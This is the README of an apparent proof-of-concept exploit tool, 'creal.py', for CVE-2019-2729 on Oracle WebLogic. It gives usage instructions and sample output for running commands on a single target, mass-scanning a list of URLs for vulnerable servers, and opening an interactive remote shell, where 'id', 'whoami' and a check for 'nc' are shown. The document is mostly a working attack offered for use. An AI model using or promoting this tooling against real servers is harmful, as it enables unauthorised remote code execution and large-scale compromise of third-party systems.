PoC for exploiting CVE-2019-2729 on WebLogic# CVE-2019-2729 - creal
PoC for exploiting CVE-2019-2729 on WebLogic
### Exploit Usage
```
python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL target url
-f F, --file F url file
-c CMD, --command CMD
command
-s SH, --shell SH url to connect
```
#### Exploit single target:
```
$ python3 creal.py -u http://IP:PORT -c id
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
uid=500(UID) gid=500(GID) groups=500(GROUP)
```
#### Exploit url list
```
$ python3 creal.py -f list.txt -c id
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
uid=500(UID) gid=500(GID) groups=500(GROUP)
[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!
--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx
```
#### Interactive shell
```
$ python3 creal.py -s http://IP:PORT
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER
> id
uid=500(UID) gid=500(GID) groups=500(GROUP)
> whoami
USER
> which nc
/usr/bin/nc
```
[4.0K] /data/pocs/2dde2a3c4a0ef0c6b884dea7e65fc4a7a4b915f8
├── [1.3M] creal.py
└── [1.6K] README.md
0 directories, 2 files